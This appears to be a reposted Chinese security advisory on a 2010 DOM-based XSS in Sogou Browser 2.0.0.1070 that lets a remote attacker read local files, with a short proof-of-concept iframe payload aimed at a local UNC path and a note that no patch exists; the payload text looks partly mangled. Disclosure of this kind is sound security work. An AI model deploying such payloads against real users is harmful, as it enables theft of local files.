作者:real存在尹 | 来源:互联网 | 2023-08-30 17:38
发布时间:2010-08-11影响版本:搜狗浏览器2.0.0.1070漏洞描述:搜狗浏览器设计时存在一些问题,结合一些其他漏洞,可能导致非法用户可以远程读取任意本地文件搜狗浏览器使
发布时间:2010-08-11
影响版本:搜狗浏览器 2.0.0.1070
漏洞描述:搜狗浏览器设计时存在一些问题,结合一些其他漏洞,可能导致非法用户可以远程读取任意本地文件
搜狗浏览器使用本地的Html来开发一些一些功能,但是其中一个Html里存在着dom类型的xss漏洞,由于xss发生在本地所以可以获得本地的权限,利用Javascript即可读取任意的本地文件
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
|
<iframe src='\\127.0.0.1\c$/Program%20Files/SogouExplorer/StartPage/Local/iframe.html?type=)"> ---------------------------------------------- <iframe src='\\127.0.0.1\c$/Program Files/SogouExplorer/StartPage/Local/iframe.html?type=)">></iframe> |
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://ie.sogou.com/